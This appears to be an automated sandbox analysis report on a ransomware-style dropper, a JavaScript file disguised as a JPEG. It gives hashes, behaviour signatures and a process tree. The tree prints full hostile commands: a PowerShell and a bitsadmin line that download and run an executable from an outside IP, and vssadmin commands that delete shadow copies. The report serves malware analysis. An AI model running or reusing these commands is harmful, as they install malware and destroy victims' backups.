Analysis

  • max time kernel
    125s
  • max time network
    126s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    08-07-2020 01:25

General

  • Target

    PIC180168.jpg.js

  • Size

    253KB

  • MD5

    2c0a6e6f385e471bdb870a723e33cc4d

  • SHA1

    07415191a13e6943eb2e0f41bdf6cf7acfa70156

  • SHA256

    6389e3c49b6f4009ca0f1631436d481065a3b3cfab7a15a073edbb61dd971c73

  • SHA512

    39ca7bbd702a4aede2f57406d57cf1e7a05128e2723372fe084e7db9bf69594fe904cfd5d6f6a92d4b95fda9edd575d10977a9f8b52ae526fbf19fc204746048

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://217.8.117.63/tspm.exe

Signatures

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 3 IoCs
  • UAC bypass 3 TTPs 2 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs
  • Suspicious use of AdjustPrivilegeToken 67 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Windows security bypass 2 TTPs 6 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Adds Run entry to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Drops file in Windows directory 3 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 613 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Windows security modification 2 TTPs 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Interacts with shadow copies 2 TTPs 3 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\PIC180168.jpg.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:504
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspm.exe','C:\Users\Admin\AppData\Local\Temp\8468468468.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\8468468468.exe'
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:808
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspm.exe','C:\Users\Admin\AppData\Local\Temp\8468468468.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\8468468468.exe'
        3⤵
        • Suspicious use of WriteProcessMemory
        • Suspicious use of AdjustPrivilegeToken
        • Blacklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        PID:1184
        • C:\Users\Admin\AppData\Local\Temp\8468468468.exe
          "C:\Users\Admin\AppData\Local\Temp\8468468468.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          • Adds Run entry to start application
          • Drops file in Windows directory
          • Executes dropped EXE
          PID:2672
          • C:\Windows\265618363602\taskhostw.exe
            C:\Windows\265618363602\taskhostw.exe
            5⤵
            • Modifies Windows Defender Real-time Protection settings
            • Suspicious use of WriteProcessMemory
            • Windows security bypass
            • Executes dropped EXE
            • Windows security modification
            PID:4032
            • C:\Users\Admin\AppData\Local\Temp\2537425072.exe
              C:\Users\Admin\AppData\Local\Temp\2537425072.exe
              6⤵
              • UAC bypass
              • Suspicious use of WriteProcessMemory
              • Checks whether UAC is enabled
              • Suspicious behavior: EnumeratesProcesses
              • System policy modification
              • Executes dropped EXE
              • Drops desktop.ini file(s)
              PID:3664
              • C:\Windows\SysWOW64\Wbem\wmic.exe
                wmic.exe SHADOWCOPY /nointeractive
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:736
              • C:\Windows\SysWOW64\vssadmin.exe
                vssadmin.exe Delete Shadows /All /Quiet
                7⤵
                • Interacts with shadow copies
                PID:2884
              • C:\Windows\SysWOW64\Wbem\wmic.exe
                wmic.exe SHADOWCOPY /nointeractive
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1336
              • C:\Windows\SysWOW64\vssadmin.exe
                vssadmin.exe Delete Shadows /All /Quiet
                7⤵
                • Interacts with shadow copies
                PID:2300
              • C:\Windows\SysWOW64\Wbem\wmic.exe
                wmic.exe SHADOWCOPY /nointeractive
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3824
              • C:\Windows\SysWOW64\vssadmin.exe
                vssadmin.exe Delete Shadows /All /Quiet
                7⤵
                • Interacts with shadow copies
                PID:3564
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c bitsadmin /transfer 4g44h4wh4hwdw /download /priority high http://217.8.117.63/tspm.exe C:\Users\Admin\AppData\Local\Temp\24624627.exe&start C:\Users\Admin\AppData\Local\Temp\24624627.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1000
      • C:\Windows\system32\bitsadmin.exe
        bitsadmin /transfer 4g44h4wh4hwdw /download /priority high http://217.8.117.63/tspm.exe C:\Users\Admin\AppData\Local\Temp\24624627.exe
        3⤵
        • Download via BitsAdmin
        PID:1288
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1016

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\2537425072.exe

  • C:\Users\Admin\AppData\Local\Temp\2537425072.exe

  • C:\Users\Admin\AppData\Local\Temp\8468468468.exe

  • C:\Users\Admin\AppData\Local\Temp\8468468468.exe

  • C:\Windows\265618363602\taskhostw.exe

  • C:\Windows\265618363602\taskhostw.exe

  • memory/736-13-0x0000000000000000-mapping.dmp

  • memory/808-0-0x0000000000000000-mapping.dmp

  • memory/1000-1-0x0000000000000000-mapping.dmp

  • memory/1184-2-0x0000000000000000-mapping.dmp

  • memory/1288-3-0x0000000000000000-mapping.dmp

  • memory/1336-15-0x0000000000000000-mapping.dmp

  • memory/2300-16-0x0000000000000000-mapping.dmp

  • memory/2672-4-0x0000000000000000-mapping.dmp

  • memory/2884-14-0x0000000000000000-mapping.dmp

  • memory/3564-18-0x0000000000000000-mapping.dmp

  • memory/3664-10-0x0000000000000000-mapping.dmp

  • memory/3824-17-0x0000000000000000-mapping.dmp

  • memory/4032-7-0x0000000000000000-mapping.dmp